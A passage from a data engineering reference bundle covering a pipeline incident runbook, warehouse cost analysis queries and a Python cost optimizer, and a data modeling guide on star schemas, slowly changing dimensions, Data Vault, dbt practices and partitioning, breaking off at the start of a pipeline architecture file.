description: "Pipeline {{ $labels.pipeline_name }} processed only {{ $value }} rows in 24h"
```
---
## Incident Response
### Runbook Template
```markdown
# Incident Runbook: Data Pipeline Failure
## Overview
This runbook covers procedures for handling data pipeline failures.
## Severity Levels
- **P1 (Critical)**: Data older than 24 hours, revenue-impacting
- **P2 (High)**: Data older than 4 hours, customer-facing dashboards affected
- **P3 (Medium)**: Data older than 1 hour, internal reports delayed
- **P4 (Low)**: Non-critical pipeline, no business impact
## Initial Response (First 15 minutes)
### 1. Acknowledge the Alert
```bash
# Acknowledge in PagerDuty
curl -X POST https://api.pagerduty.com/incidents/{incident_id}/acknowledge
# Post in #data-incidents Slack channel
```
### 2. Assess Impact
- Which tables are affected?
- Which downstream consumers are impacted?
- What is the data freshness currently?
```sql
-- Check data freshness
SELECT
table_name,
MAX(updated_at) as last_update,
DATEDIFF(hour, MAX(updated_at), CURRENT_TIMESTAMP) as hours_stale
FROM information_schema.tables
WHERE table_schema = 'analytics'
GROUP BY table_name
ORDER BY hours_stale DESC;
```
### 3. Identify Root Cause
#### Check Pipeline Status
```bash
# Airflow
airflow dags list-runs -d <dag_id> --state failed
# dbt
dbt debug
dbt run --select state:failed
# Spark
spark-submit --status <application_id>
```
#### Common Failure Modes
| Symptom | Likely Cause | Fix |
|---------|--------------|-----|
| OOM errors | Data volume spike | Increase memory, add partitioning |
| Timeout | Slow query | Optimize query, check locks |
| Connection refused | Network/auth | Check credentials, VPC rules |
| Schema mismatch | Source change | Update schema, add contract |
| Duplicate key | Upstream bug | Deduplicate, fix source |
## Resolution Procedures
### Restart Failed Pipeline
```bash
# Clear failed Airflow task
airflow tasks clear <dag_id> -t <task_id> -s <start_date> -e <end_date>
# Rerun dbt model
dbt run --select <model_name>+
# Resubmit Spark job
spark-submit --deploy-mode cluster <job.py>
```
### Backfill Missing Data
```bash
# Airflow backfill
airflow dags backfill -s 2024-01-01 -e 2024-01-02 <dag_id>
# dbt incremental refresh
dbt run --full-refresh --select <model_name>
```
### Rollback Procedure
```bash
# dbt rollback (use previous version)
git checkout <previous_sha> -- models/<model>.sql
dbt run --select <model_name>
# Delta Lake time travel
spark.sql("""
RESTORE TABLE analytics.orders TO VERSION AS OF 10
""")
```
## Post-Incident
### 1. Write Incident Report
- Timeline of events
- Root cause analysis
- Impact assessment
- Remediation steps taken
- Follow-up action items
### 2. Update Monitoring
- Add missing alerts
- Adjust thresholds
- Improve documentation
### 3. Share Learnings
- Post in #data-engineering
- Update runbooks
- Schedule blameless postmortem if P1/P2
```
---
## Cost Optimization
### Query Cost Analysis
```sql
-- Snowflake query cost analysis
SELECT
query_id,
user_name,
warehouse_name,
execution_time / 1000 as execution_seconds,
bytes_scanned / 1e9 as gb_scanned,
credits_used_cloud_services,
query_text
FROM snowflake.account_usage.query_history
WHERE start_time > DATEADD(day, -7, CURRENT_TIMESTAMP)
ORDER BY credits_used_cloud_services DESC
LIMIT 20;
-- BigQuery cost analysis
SELECT
user_email,
query,
total_bytes_processed / 1e12 as tb_processed,
total_bytes_processed / 1e12 * 5 as estimated_cost_usd, -- $5/TB
creation_time
FROM `project.region-us.INFORMATION_SCHEMA.JOBS_BY_USER`
WHERE creation_time > TIMESTAMP_SUB(CURRENT_TIMESTAMP(), INTERVAL 7 DAY)
ORDER BY total_bytes_processed DESC
LIMIT 20;
```
### Cost Optimization Strategies
```python
# cost/optimizer.py
from dataclasses import dataclass
from typing import List, Dict
import pandas as pd
@dataclass
class CostRecommendation:
category: str
current_cost: float
potential_savings: float
recommendation: str
priority: str
class CostOptimizer:
"""Analyze and optimize data platform costs."""
def __init__(self, connection):
self.conn = connection
def analyze_query_costs(self) -> List[CostRecommendation]:
"""Identify expensive queries and optimization opportunities."""
recommendations = []
# Find queries scanning full tables
full_scans = self.conn.execute("""
SELECT
query_text,
COUNT(*) as execution_count,
AVG(bytes_scanned) as avg_bytes,
SUM(credits_used) as total_credits
FROM query_history
WHERE bytes_scanned > 1e10 -- > 10GB
AND start_time > DATEADD(day, -7, CURRENT_TIMESTAMP)
GROUP BY query_text
HAVING COUNT(*) > 10
ORDER BY total_credits DESC
""").fetchall()
for query, count, avg_bytes, credits in full_scans:
recommendations.append(CostRecommendation(
category="Query Optimization",
current_cost=credits,
potential_savings=credits * 0.7, # Estimate 70% savings
recommendation=f"Add WHERE clause or partitioning to reduce scan. Query runs {count}x/week, scans {avg_bytes/1e9:.1f}GB each time.",
priority="high"
))
return recommendations
def analyze_storage_costs(self) -> List[CostRecommendation]:
"""Identify storage optimization opportunities."""
recommendations = []
# Find large unused tables
unused_tables = self.conn.execute("""
SELECT
table_name,
bytes / 1e9 as size_gb,
last_accessed
FROM table_metadata
WHERE last_accessed < DATEADD(day, -90, CURRENT_TIMESTAMP)
AND bytes > 1e9 -- > 1GB
ORDER BY bytes DESC
""").fetchall()
for table, size, last_accessed in unused_tables:
monthly_cost = size * 0.023 # $0.023/GB/month for S3
recommendations.append(CostRecommendation(
category="Storage",
current_cost=monthly_cost,
potential_savings=monthly_cost,
recommendation=f"Table {table} ({size:.1f}GB) not accessed since {last_accessed}. Consider archiving or deleting.",
priority="medium"
))
# Find tables without partitioning
unpartitioned = self.conn.execute("""
SELECT table_name, bytes / 1e9 as size_gb
FROM table_metadata
WHERE partition_column IS NULL
AND bytes > 10e9 -- > 10GB
""").fetchall()
for table, size in unpartitioned:
recommendations.append(CostRecommendation(
category="Storage",
current_cost=0,
potential_savings=size * 0.1, # Estimate 10% query cost savings
recommendation=f"Table {table} ({size:.1f}GB) is not partitioned. Add partitioning to reduce query costs.",
priority="high"
))
return recommendations
def analyze_compute_costs(self) -> List[CostRecommendation]:
"""Identify compute optimization opportunities."""
recommendations = []
# Find oversized warehouses
warehouse_util = self.conn.execute("""
SELECT
warehouse_name,
warehouse_size,
AVG(avg_running_queries) as avg_queries,
AVG(credits_used) as avg_credits
FROM warehouse_metering_history
WHERE start_time > DATEADD(day, -7, CURRENT_TIMESTAMP)
GROUP BY warehouse_name, warehouse_size
""").fetchall()
for wh, size, avg_queries, avg_credits in warehouse_util:
if avg_queries < 1 and size not in ['X-Small', 'Small']:
recommendations.append(CostRecommendation(
category="Compute",
current_cost=avg_credits * 7, # Weekly
potential_savings=avg_credits * 7 * 0.5,
recommendation=f"Warehouse {wh} ({size}) has low utilization ({avg_queries:.1f} avg queries). Consider downsizing.",
priority="high"
))
return recommendations
def generate_report(self) -> Dict:
"""Generate comprehensive cost optimization report."""
all_recommendations = (
self.analyze_query_costs() +
self.analyze_storage_costs() +
self.analyze_compute_costs()
)
total_current = sum(r.current_cost for r in all_recommendations)
total_savings = sum(r.potential_savings for r in all_recommendations)
return {
"total_current_monthly_cost": total_current,
"total_potential_savings": total_savings,
"savings_percentage": total_savings / total_current * 100 if total_current > 0 else 0,
"recommendations": [
{
"category": r.category,
"current_cost": r.current_cost,
"potential_savings": r.potential_savings,
"recommendation": r.recommendation,
"priority": r.priority
}
for r in sorted(all_recommendations, key=lambda x: -x.potential_savings)
]
}
```
FILE:references/data_modeling_patterns.md
# Data Modeling Patterns
Comprehensive guide to data modeling for analytics and data warehousing.
## Table of Contents
1. [Dimensional Modeling](#dimensional-modeling)
2. [Slowly Changing Dimensions](#slowly-changing-dimensions)
3. [Data Vault Modeling](#data-vault-modeling)
4. [dbt Best Practices](#dbt-best-practices)
5. [Partitioning and Clustering](#partitioning-and-clustering)
6. [Schema Evolution](#schema-evolution)
---
## Dimensional Modeling
### Star Schema
The most common pattern for analytical data models. One fact table surrounded by dimension tables.
```
┌─────────────┐
│ dim_product │
└──────┬──────┘
│
┌─────────────┐ ┌───────▼───────┐ ┌─────────────┐
│ dim_customer│◄───│ fct_sales │───►│ dim_date │
└─────────────┘ └───────┬───────┘ └─────────────┘
│
┌──────▼──────┐
│ dim_store │
└─────────────┘
```
**Fact Table (fct_sales):**
```sql
CREATE TABLE fct_sales (
sale_id BIGINT PRIMARY KEY,
-- Foreign keys to dimensions
customer_key INT REFERENCES dim_customer(customer_key),
product_key INT REFERENCES dim_product(product_key),
store_key INT REFERENCES dim_store(store_key),
date_key INT REFERENCES dim_date(date_key),
-- Degenerate dimension (no separate table)
order_number VARCHAR(50),
-- Measures (facts)
quantity INT,
unit_price DECIMAL(10,2),
discount_amount DECIMAL(10,2),
net_amount DECIMAL(10,2),
tax_amount DECIMAL(10,2),
total_amount DECIMAL(10,2),
-- Audit columns
created_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP,
updated_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP
);
-- Partition by date for query performance
ALTER TABLE fct_sales
PARTITION BY RANGE (date_key);
```
**Dimension Table (dim_customer):**
```sql
CREATE TABLE dim_customer (
customer_key INT PRIMARY KEY, -- Surrogate key
customer_id VARCHAR(50), -- Natural/business key
-- Attributes
first_name VARCHAR(100),
last_name VARCHAR(100),
email VARCHAR(255),
phone VARCHAR(50),
-- Hierarchies
city VARCHAR(100),
state VARCHAR(100),
country VARCHAR(100),
region VARCHAR(50),
-- SCD tracking
effective_date DATE,
expiration_date DATE,
is_current BOOLEAN,
-- Audit
created_at TIMESTAMP,
updated_at TIMESTAMP
);
```
**Date Dimension:**
```sql
CREATE TABLE dim_date (
date_key INT PRIMARY KEY, -- YYYYMMDD format
full_date DATE,
-- Day attributes
day_of_week INT,
day_of_month INT,
day_of_year INT,
day_name VARCHAR(10),
is_weekend BOOLEAN,
is_holiday BOOLEAN,
-- Week attributes
week_of_year INT,
week_start_date DATE,
week_end_date DATE,
-- Month attributes
month_number INT,
month_name VARCHAR(10),
month_start_date DATE,
month_end_date DATE,
-- Quarter attributes
quarter_number INT,
quarter_name VARCHAR(10),
-- Year attributes
year_number INT,
fiscal_year INT,
fiscal_quarter INT,
-- Relative flags
is_current_day BOOLEAN,
is_current_week BOOLEAN,
is_current_month BOOLEAN,
is_current_quarter BOOLEAN,
is_current_year BOOLEAN
);
-- Generate date dimension
INSERT INTO dim_date
SELECT
TO_CHAR(d, 'YYYYMMDD')::INT as date_key,
d as full_date,
EXTRACT(DOW FROM d) as day_of_week,
EXTRACT(DAY FROM d) as day_of_month,
EXTRACT(DOY FROM d) as day_of_year,
TO_CHAR(d, 'Day') as day_name,
EXTRACT(DOW FROM d) IN (0, 6) as is_weekend,
FALSE as is_holiday, -- Update from holiday calendar
EXTRACT(WEEK FROM d) as week_of_year,
DATE_TRUNC('week', d) as week_start_date,
DATE_TRUNC('week', d) + INTERVAL '6 days' as week_end_date,
EXTRACT(MONTH FROM d) as month_number,
TO_CHAR(d, 'Month') as month_name,
DATE_TRUNC('month', d) as month_start_date,
(DATE_TRUNC('month', d) + INTERVAL '1 month' - INTERVAL '1 day')::DATE as month_end_date,
EXTRACT(QUARTER FROM d) as quarter_number,
'Q' || EXTRACT(QUARTER FROM d) as quarter_name,
EXTRACT(YEAR FROM d) as year_number,
-- Fiscal year (assuming July start)
CASE WHEN EXTRACT(MONTH FROM d) >= 7 THEN EXTRACT(YEAR FROM d) + 1
ELSE EXTRACT(YEAR FROM d) END as fiscal_year,
CASE WHEN EXTRACT(MONTH FROM d) >= 7 THEN CEIL((EXTRACT(MONTH FROM d) - 6) / 3.0)
ELSE CEIL((EXTRACT(MONTH FROM d) + 6) / 3.0) END as fiscal_quarter,
d = CURRENT_DATE as is_current_day,
d >= DATE_TRUNC('week', CURRENT_DATE) AND d < DATE_TRUNC('week', CURRENT_DATE) + INTERVAL '7 days' as is_current_week,
DATE_TRUNC('month', d) = DATE_TRUNC('month', CURRENT_DATE) as is_current_month,
DATE_TRUNC('quarter', d) = DATE_TRUNC('quarter', CURRENT_DATE) as is_current_quarter,
EXTRACT(YEAR FROM d) = EXTRACT(YEAR FROM CURRENT_DATE) as is_current_year
FROM generate_series('2020-01-01'::DATE, '2030-12-31'::DATE, '1 day'::INTERVAL) d;
```
### Snowflake Schema
Normalized dimensions for reduced storage and update anomalies.
```
┌─────────────┐
│ dim_category│
└──────┬──────┘
│
┌─────────────┐ ┌───────────▼────┐ ┌─────────────┐
│ dim_customer│◄───│ fct_sales │───►│ dim_product │
└──────┬──────┘ └───────┬────────┘ └──────┬──────┘
│ │ │
┌──────▼──────┐ ┌───────▼───────┐ ┌──────▼──────┐
│ dim_geography│ │ dim_date │ │ dim_brand │
└─────────────┘ └───────────────┘ └─────────────┘
```
**When to use Snowflake vs Star:**
| Criteria | Star Schema | Snowflake Schema |
|----------|-------------|------------------|
| Query complexity | Simple JOINs | More JOINs required |
| Query performance | Faster (fewer JOINs) | Slower |
| Storage | Higher (denormalized) | Lower (normalized) |
| ETL complexity | Higher | Lower |
| Dimension updates | Multiple places | Single place |
| Best for | BI/reporting | Storage-constrained |
### One Big Table (OBT)
Fully denormalized single table - gaining popularity with modern columnar warehouses.
```sql
CREATE TABLE obt_sales AS
SELECT
-- Fact measures
s.sale_id,
s.quantity,
s.unit_price,
s.total_amount,
-- Customer attributes (denormalized)
c.customer_id,
c.first_name,
c.last_name,
c.email,
c.city,
c.state,
c.country,
-- Product attributes (denormalized)
p.product_id,
p.product_name,
p.category,
p.subcategory,
p.brand,
-- Date attributes (denormalized)
d.full_date as sale_date,
d.year_number,
d.quarter_number,
d.month_name,
d.week_of_year,
d.is_weekend
FROM fct_sales s
JOIN dim_customer c ON s.customer_key = c.customer_key AND c.is_current
JOIN dim_product p ON s.product_key = p.product_key AND p.is_current
JOIN dim_date d ON s.date_key = d.date_key;
```
**OBT Tradeoffs:**
| Pros | Cons |
|------|------|
| Simple queries (no JOINs) | Storage bloat |
| Fast for analytics | Harder to maintain |
| Great with columnar storage | Stale data risk |
| Self-documenting | Update anomalies |
---
## Slowly Changing Dimensions
### Type 0: Fixed Dimension
No changes allowed - original value preserved forever.
```sql
-- Type 0: Never update these fields
CREATE TABLE dim_customer_type0 (
customer_key INT PRIMARY KEY,
customer_id VARCHAR(50),
original_signup_date DATE, -- Never changes
original_source VARCHAR(50) -- Never changes
);
```
### Type 1: Overwrite
Simply overwrite old value with new. No history preserved.
```sql
-- Type 1: Update in place
UPDATE dim_customer
SET
email = 'new.email@example.com',
updated_at = CURRENT_TIMESTAMP
WHERE customer_id = 'CUST001';
-- dbt implementation (Type 1)
-- models/dim_customer_type1.sql
{{
config(
materialized='table',
unique_key='customer_id'
)
}}
SELECT
customer_id,
first_name,
last_name,
email, -- Current value only
phone,
address,
CURRENT_TIMESTAMP as updated_at
FROM {{ source('raw', 'customers') }}
```
### Type 2: Add New Row
Create new record with new values. Full history preserved.
```sql
-- Type 2 dimension structure
CREATE TABLE dim_customer_scd2 (
customer_key SERIAL PRIMARY KEY, -- Surrogate key
customer_id VARCHAR(50), -- Natural key
first_name VARCHAR(100),
last_name VARCHAR(100),
email VARCHAR(255),
city VARCHAR(100),
state VARCHAR(100),
-- SCD2 tracking columns
effective_start_date TIMESTAMP,
effective_end_date TIMESTAMP,
is_current BOOLEAN,
-- Hash for change detection
row_hash VARCHAR(64)
);
-- SCD2 merge logic
MERGE INTO dim_customer_scd2 AS target
USING (
SELECT
customer_id,
first_name,
last_name,
email,
city,
state,
MD5(CONCAT(first_name, last_name, email, city, state)) as row_hash
FROM staging_customers
) AS source
ON target.customer_id = source.customer_id AND target.is_current = TRUE
-- Close existing record if changed
WHEN MATCHED AND target.row_hash != source.row_hash THEN
UPDATE SET
effective_end_date = CURRENT_TIMESTAMP,
is_current = FALSE
-- Insert new record for changes
WHEN NOT MATCHED OR (MATCHED AND target.row_hash != source.row_hash) THEN
INSERT (customer_id, first_name, last_name, email, city, state,
effective_start_date, effective_end_date, is_current, row_hash)
VALUES (source.customer_id, source.first_name, source.last_name, source.email,
source.city, source.state, CURRENT_TIMESTAMP, '9999-12-31', TRUE, source.row_hash);
```
**dbt SCD2 Implementation:**
```sql
-- models/dim_customer_scd2.sql
{{
config(
materialized='incremental',
unique_key='customer_key',
strategy='check',
check_cols=['first_name', 'last_name', 'email', 'city', 'state']
)
}}
WITH source_data AS (
SELECT
customer_id,
first_name,
last_name,
email,
city,
state,
MD5(CONCAT_WS('|', first_name, last_name, email, city, state)) as row_hash,
CURRENT_TIMESTAMP as extracted_at
FROM {{ source('raw', 'customers') }}
),
{% if is_incremental() %}
-- Get current records that have changed
changed_records AS (
SELECT
s.*,
t.customer_key as existing_key
FROM source_data s
LEFT JOIN {{ this }} t
ON s.customer_id = t.customer_id
AND t.is_current = TRUE
WHERE t.customer_key IS NULL -- New record
OR t.row_hash != s.row_hash -- Changed record
)
{% endif %}
SELECT
{{ dbt_utils.generate_surrogate_key(['customer_id', 'extracted_at']) }} as customer_key,
customer_id,
first_name,
last_name,
email,
city,
state,
extracted_at as effective_start_date,
CAST('9999-12-31' AS TIMESTAMP) as effective_end_date,
TRUE as is_current,
row_hash
{% if is_incremental() %}
FROM changed_records
{% else %}
FROM source_data
{% endif %}
```
### Type 3: Add New Column
Add column for previous value. Limited history (usually just prior value).
```sql
-- Type 3: Previous value column
CREATE TABLE dim_customer_scd3 (
customer_key INT PRIMARY KEY,
customer_id VARCHAR(50),
city VARCHAR(100),
previous_city VARCHAR(100), -- Previous value
city_change_date DATE,
state VARCHAR(100),
previous_state VARCHAR(100),
state_change_date DATE
);
-- Update Type 3
UPDATE dim_customer_scd3
SET
previous_city = city,
city = 'New York',
city_change_date = CURRENT_DATE
WHERE customer_id = 'CUST001';
```
### Type 4: Mini-Dimension
Separate rapidly changing attributes into a mini-dimension.
```sql
-- Main customer dimension (slowly changing)
CREATE TABLE dim_customer (
customer_key INT PRIMARY KEY,
customer_id VARCHAR(50),
first_name VARCHAR(100),
last_name VARCHAR(100),
email VARCHAR(255)
);
-- Mini-dimension for rapidly changing attributes
CREATE TABLE dim_customer_profile (
profile_key INT PRIMARY KEY,
age_band VARCHAR(20), -- '18-24', '25-34', etc.
income_band VARCHAR(20), -- 'Low', 'Medium', 'High'
loyalty_tier VARCHAR(20) -- 'Bronze', 'Silver', 'Gold'
);
-- Fact table references both
CREATE TABLE fct_sales (
sale_id BIGINT PRIMARY KEY,
customer_key INT REFERENCES dim_customer,
profile_key INT REFERENCES dim_customer_profile, -- Current profile at time of sale
...
);
```
### Type 6: Hybrid (1 + 2 + 3)
Combines Types 1, 2, and 3 for maximum flexibility.
```sql
-- Type 6: Combined approach
CREATE TABLE dim_customer_scd6 (
customer_key INT PRIMARY KEY,
customer_id VARCHAR(50),
-- Current values (Type 1 - always updated)
current_city VARCHAR(100),
current_state VARCHAR(100),
-- Historical values (Type 2 - row versioned)
historical_city VARCHAR(100),
historical_state VARCHAR(100),
-- Previous values (Type 3)
previous_city VARCHAR(100),
-- SCD2 tracking
effective_start_date TIMESTAMP,
effective_end_date TIMESTAMP,
is_current BOOLEAN
);
```
---
## Data Vault Modeling
### Core Concepts
Data Vault provides:
- Full historization
- Parallel loading
- Flexibility for changing business rules
- Auditability
```
┌─────────────┐ ┌─────────────┐ ┌─────────────┐
│ Hub_Customer│◄───│Link_Customer│───►│ Hub_Order │
│ │ │ _Order │ │ │
└──────┬───────┘ └─────────────┘ └──────┬──────┘
│ │
▼ ▼
┌─────────────┐ ┌─────────────┐
│Sat_Customer │ │ Sat_Order │
│ _Details │ │ _Details │
└─────────────┘ └─────────────┘
```
### Hub Tables
Business keys and surrogate keys only.
```sql
-- Hub: Business entity identifier
CREATE TABLE hub_customer (
hub_customer_key VARCHAR(64) PRIMARY KEY, -- Hash of business key
customer_id VARCHAR(50), -- Business key
load_date TIMESTAMP,
record_source VARCHAR(100)
);
-- Hub loading (idempotent insert)
INSERT INTO hub_customer (hub_customer_key, customer_id, load_date, record_source)
SELECT
MD5(customer_id) as hub_customer_key,
customer_id,
CURRENT_TIMESTAMP as load_date,
'SOURCE_CRM' as record_source
FROM staging_customers s
WHERE NOT EXISTS (
SELECT 1 FROM hub_customer h
WHERE h.customer_id = s.customer_id
);
```
### Satellite Tables
Descriptive attributes with full history.
```sql
-- Satellite: Attributes with history
CREATE TABLE sat_customer_details (
hub_customer_key VARCHAR(64),
load_date TIMESTAMP,
load_end_date TIMESTAMP,
-- Descriptive attributes
first_name VARCHAR(100),
last_name VARCHAR(100),
email VARCHAR(255),
phone VARCHAR(50),
-- Change detection
hash_diff VARCHAR(64),
record_source VARCHAR(100),
PRIMARY KEY (hub_customer_key, load_date),
FOREIGN KEY (hub_customer_key) REFERENCES hub_customer
);
-- Satellite loading (delta detection)
INSERT INTO sat_customer_details
SELECT
MD5(s.customer_id) as hub_customer_key,
CURRENT_TIMESTAMP as load_date,
NULL as load_end_date,
s.first_name,
s.last_name,
s.email,
s.phone,
MD5(CONCAT_WS('|', s.first_name, s.last_name, s.email, s.phone)) as hash_diff,
'SOURCE_CRM' as record_source
FROM staging_customers s
LEFT JOIN sat_customer_details sat
ON MD5(s.customer_id) = sat.hub_customer_key
AND sat.load_end_date IS NULL
WHERE sat.hub_customer_key IS NULL -- New customer
OR sat.hash_diff != MD5(CONCAT_WS('|', s.first_name, s.last_name, s.email, s.phone)); -- Changed
-- Close previous satellite records
UPDATE sat_customer_details
SET load_end_date = CURRENT_TIMESTAMP
WHERE hub_customer_key IN (
SELECT MD5(customer_id) FROM staging_customers
)
AND load_end_date IS NULL
AND load_date < CURRENT_TIMESTAMP;
```
### Link Tables
Relationships between hubs.
```sql
-- Link: Relationship between entities
CREATE TABLE link_customer_order (
link_customer_order_key VARCHAR(64) PRIMARY KEY,
hub_customer_key VARCHAR(64),
hub_order_key VARCHAR(64),
load_date TIMESTAMP,
record_source VARCHAR(100),
FOREIGN KEY (hub_customer_key) REFERENCES hub_customer,
FOREIGN KEY (hub_order_key) REFERENCES hub_order
);
-- Link loading
INSERT INTO link_customer_order
SELECT
MD5(CONCAT(s.customer_id, '|', s.order_id)) as link_customer_order_key,
MD5(s.customer_id) as hub_customer_key,
MD5(s.order_id) as hub_order_key,
CURRENT_TIMESTAMP as load_date,
'SOURCE_ORDERS' as record_source
FROM staging_orders s
WHERE NOT EXISTS (
SELECT 1 FROM link_customer_order l
WHERE l.hub_customer_key = MD5(s.customer_id)
AND l.hub_order_key = MD5(s.order_id)
);
```
---
## dbt Best Practices
### Model Organization
```
models/
├── staging/ # 1:1 with source tables
│ ├── stg_orders.sql
│ ├── stg_customers.sql
│ └── _staging.yml
├── intermediate/ # Business logic transformations
│ ├── int_orders_enriched.sql
│ └── _intermediate.yml
└── marts/ # Business-facing models
├── core/
│ ├── dim_customers.sql
│ ├── fct_orders.sql
│ └── _core.yml
└── marketing/
├── mrt_customer_segments.sql
└── _marketing.yml
```
### Staging Models
```sql
-- models/staging/stg_orders.sql
{{
config(
materialized='view'
)
}}
WITH source AS (
SELECT * FROM {{ source('ecommerce', 'orders') }}
),
renamed AS (
SELECT
-- Primary key
id as order_id,
-- Foreign keys
customer_id,
product_id,
-- Timestamps
created_at as order_created_at,
updated_at as order_updated_at,
-- Measures
quantity,
CAST(unit_price AS DECIMAL(10,2)) as unit_price,
CAST(discount AS DECIMAL(5,2)) as discount_percent,
-- Status
UPPER(status) as order_status
FROM source
)
SELECT * FROM renamed
```
### Intermediate Models
```sql
-- models/intermediate/int_orders_enriched.sql
{{
config(
materialized='ephemeral' -- Not persisted, just CTE
)
}}
WITH orders AS (
SELECT * FROM {{ ref('stg_orders') }}
),
customers AS (
SELECT * FROM {{ ref('stg_customers') }}
),
products AS (
SELECT * FROM {{ ref('stg_products') }}
),
enriched AS (
SELECT
o.order_id,
o.order_created_at,
o.order_status,
-- Customer info
c.customer_id,
c.customer_name,
c.customer_segment,
-- Product info
p.product_id,
p.product_name,
p.category,
-- Calculated fields
o.quantity,
o.unit_price,
o.quantity * o.unit_price as gross_amount,
o.quantity * o.unit_price * (1 - COALESCE(o.discount_percent, 0) / 100) as net_amount
FROM orders o
LEFT JOIN customers c ON o.customer_id = c.customer_id
LEFT JOIN products p ON o.product_id = p.product_id
)
SELECT * FROM enriched
```
### Incremental Models
```sql
-- models/marts/fct_orders.sql
{{
config(
materialized='incremental',
unique_key='order_id',
incremental_strategy='merge',
on_schema_change='sync_all_columns',
cluster_by=['order_date']
)
}}
WITH orders AS (
SELECT * FROM {{ ref('int_orders_enriched') }}
{% if is_incremental() %}
-- Only process new/changed records
WHERE order_updated_at > (
SELECT COALESCE(MAX(order_updated_at), '1900-01-01')
FROM {{ this }}
)
{% endif %}
),
final AS (
SELECT
order_id,
customer_id,
product_id,
DATE(order_created_at) as order_date,
order_created_at,
order_updated_at,
order_status,
quantity,
unit_price,
gross_amount,
net_amount,
CURRENT_TIMESTAMP as _loaded_at
FROM orders
)
SELECT * FROM final
```
### Testing
```yaml
# models/marts/_core.yml
version: 2
models:
- name: fct_orders
description: "Order fact table"
columns:
- name: order_id
tests:
- unique
- not_null
- name: customer_id
tests:
- not_null
- relationships:
to: ref('dim_customers')
field: customer_id
- name: net_amount
tests:
- not_null
- dbt_utils.accepted_range:
min_value: 0
inclusive: true
- name: order_date
tests:
- not_null
- dbt_utils.recency:
datepart: day
field: order_date
interval: 1
```
### Macros
```sql
-- macros/generate_surrogate_key.sql
{% macro generate_surrogate_key(columns) %}
{{ dbt_utils.generate_surrogate_key(columns) }}
{% endmacro %}
-- macros/cents_to_dollars.sql
{% macro cents_to_dollars(column_name) %}
ROUND({{ column_name }} / 100.0, 2)
{% endmacro %}
-- macros/safe_divide.sql
{% macro safe_divide(numerator, denominator, default=0) %}
CASE
WHEN {{ denominator }} = 0 OR {{ denominator }} IS NULL THEN {{ default }}
ELSE {{ numerator }} / {{ denominator }}
END
{% endmacro %}
-- Usage in models:
-- {{ safe_divide('revenue', 'orders') }} as avg_order_value
```
---
## Partitioning and Clustering
### Partitioning Strategies
**Time-based Partitioning (Most Common):**
```sql
-- BigQuery
CREATE TABLE fct_events
PARTITION BY DATE(event_timestamp)
CLUSTER BY user_id, event_type
AS SELECT * FROM raw_events;
-- Snowflake (automatic micro-partitioning)
-- Explicit clustering for optimization
ALTER TABLE fct_events CLUSTER BY (event_date, user_id);
-- Spark/Delta Lake
df.write \
.format("delta") \
.partitionBy("event_date") \
.save("/path/to/table")
```
**Partition Pruning:**
```sql
-- Query with partition filter (fast)
SELECT * FROM fct_events
WHERE event_date = '2024-01-15'; -- Scans only 1 partition
-- Query without partition filter (slow - full scan)
SELECT * FROM fct_events
WHERE user_id = '12345'; -- Scans all partitions
```
**Partition Size Guidelines:**
| Partition | Size Target | Notes |
|-----------|-------------|-------|
| Daily | 1-10 GB | Ideal for most cases |
| Hourly | 100 MB - 1 GB | High-volume streaming |
| Monthly | 10-100 GB | Infrequent access |
### Clustering
```sql
-- BigQuery clustering (up to 4 columns)
CREATE TABLE fct_sales
PARTITION BY DATE(sale_date)
CLUSTER BY customer_id, product_id
AS SELECT * FROM raw_sales;
-- Snowflake clustering
CREATE TABLE fct_sales (
sale_id INT,
customer_id VARCHAR(50),
product_id VARCHAR(50),
sale_date DATE,
amount DECIMAL(10,2)
)
CLUSTER BY (customer_id, sale_date);
-- Delta Lake Z-ordering
OPTIMIZE events ZORDER BY (user_id, event_type);
```
**When to Cluster:**
| Column Type | Cluster? | Notes |
|-------------|----------|-------|
| High cardinality filter columns | Yes | customer_id, product_id |
| Join keys | Yes | Improves join performance |
| Low cardinality | Maybe | status, type (limited benefit) |
| Frequently updated | No | Clustering breaks on updates |
---
## Schema Evolution
### Adding Columns
```sql
-- Safe: Add nullable column
ALTER TABLE fct_orders ADD COLUMN discount_amount DECIMAL(10,2);
-- With default
ALTER TABLE fct_orders ADD COLUMN currency VARCHAR(3) DEFAULT 'USD';
-- dbt handling
{{
config(
materialized='incremental',
on_schema_change='append_new_columns'
)
}}
```
### Handling in Spark/Delta
```python
# Delta Lake schema evolution
df.write \
.format("delta") \
.mode("append") \
.option("mergeSchema", "true") \
.save("/path/to/table")
# Explicit schema enforcement
spark.sql("""
ALTER TABLE delta.`/path/to/table`
ADD COLUMNS (new_column STRING)
""")
# Schema merge on read
df = spark.read \
.option("mergeSchema", "true") \
.format("delta") \
.load("/path/to/table")
```
### Backward Compatibility
```sql
-- Create view for backward compatibility
CREATE VIEW orders_v1 AS
SELECT
order_id,
customer_id,
amount,
-- Map new columns to old schema
COALESCE(discount_amount, 0) as discount,
COALESCE(currency, 'USD') as currency
FROM orders_v2;
-- Deprecation pattern
CREATE VIEW orders_deprecated AS
SELECT * FROM orders_v1;
-- Add comment: "DEPRECATED: Use orders_v2. Will be removed 2024-06-01"
```
### Data Contracts for Schema Changes
```yaml
# contracts/orders_contract.yaml
name: orders
version: "2.0.0"
owner: data-team@company.com
schema:
order_id:
type: string
required: true
breaking_change: never
customer_id:
type: string
required: true
breaking_change: never
amount:
type: decimal
precision: 10
scale: 2
required: true
# New in v2.0.0
discount_amount:
type: decimal
precision: 10
scale: 2
required: false
added_in: "2.0.0"
default: 0
# Deprecated in v2.0.0
legacy_status:
type: string
deprecated: true
removed_in: "3.0.0"
migration: "Use order_status instead"
compatibility:
backward: true # v2 readers can read v1 data
forward: true # v1 readers can read v2 data
```
FILE:references/data_pipeline_architecture.md
# Data Pipeline Architecture
Comprehensive guide to designing and implementing production data pipelines.
## Table of Contents
1. [Architecture Patterns](#architecture-patterns)
2. [Batch Processing](#batch-processing)
3. [Stream Processing](#stream-processing)
4. [Exactly-Once Semantics](#exactly-once-semantics)
5. [Error Handling](#error-handling)
6. [Data Ingestion Patterns](#data-ingestion-patterns)
7. [Orchestration](#orchestration)
---
## Architecture Patterns
### Lambda Architecture
The Lambda architecture combines batch and stream processing for comprehensive data handling.
```
┌─────────────────────────────────────┐
│ Data Sources │
└─────────────────┬───────────────────┘
│
┌─────────────────▼───────────────────┐
│ Message Queue (Kafka) │
└───────┬─────────────────┬───────────┘
│ │
┌─────────────▼─────┐ ┌───────▼─────────────┐
│ Batch Layer │ │ Speed Layer │
